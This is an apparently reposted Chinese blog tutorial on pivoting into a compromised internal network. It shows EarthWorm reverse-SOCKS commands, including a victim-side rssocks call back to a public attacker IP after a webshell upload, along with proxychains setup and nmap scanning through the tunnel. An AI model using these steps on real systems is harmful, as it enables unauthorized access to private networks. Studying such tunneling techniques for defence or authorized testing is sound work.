【内网穿透】kali中ew和proxychains联动socks5隧道

admin 2022年1月10日03:32:42安全博客评论11 views873字阅读2分54秒阅读模式

前言

  • kali中的proxychains和earthworm配合的socks5隧道技术

首先明确一点,拿到了对方的机子,但是对方是内网机子,我们无法连接对方的3389端口,得将对方内网带入我们的kali攻击机中,使我们可以直接访问对方内网ip,下面开始实施

首先利用ew将我们公网上的一个端口转发到本地4444端口中

1、反向连接

1
2
3
4
file /bin/ls //可以查看自己linux是多少位的,选择对应的earthworm工具

将3389端口接收到数据转发到本地的4444端口中
./ew_linux_x64 -s rcsocks -l 4444 -e 3389

image-20210825084807963

2、利用webshell上传ew然后用目标机访问,这个公网上打开3389端口的ip,就可以实现连接

1
2
3
目标机是windows10

ew_win32.exe -s rssocks -d 47.99.163.64 -e 3389

image-20210825084936368

看到rssocks cmd_socket OK!就代表成功了

然后利用proxychains来进行socks代理使用,由于我没有下载,所以需要下载proxychains,下面是步骤

1
2
3
4
5
6
7
8
9
10
11
从git上克隆下来
git clone
https://github.com/rofl0r/proxychains-ng.git
进入该目录
cd proxychains-ng
进行配置//如果报错下载gcc
./configure --prefix=/usr --sysconfdir=/etc
执行
make && make install
执行(到这一步就安装完成了)
make install-config

还有一个重要步骤,如下截图样式

1
vim /etc/proxychains.conf  //修改配置文件

image-20210825085232001

接着就可以直接用proxychains4代理来直接访问我们想要访问的内网

image-20210825085745456

也可以利用nmap来扫描端口,不过不能使用ping所以要禁止

1
proxychains4 nmap -Pn -sT 192.168.0.111

image-20210825091812115

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:32:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【内网穿透】kali中ew和proxychains联动socks5隧道 http://cn-sec.com/archives/729996.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: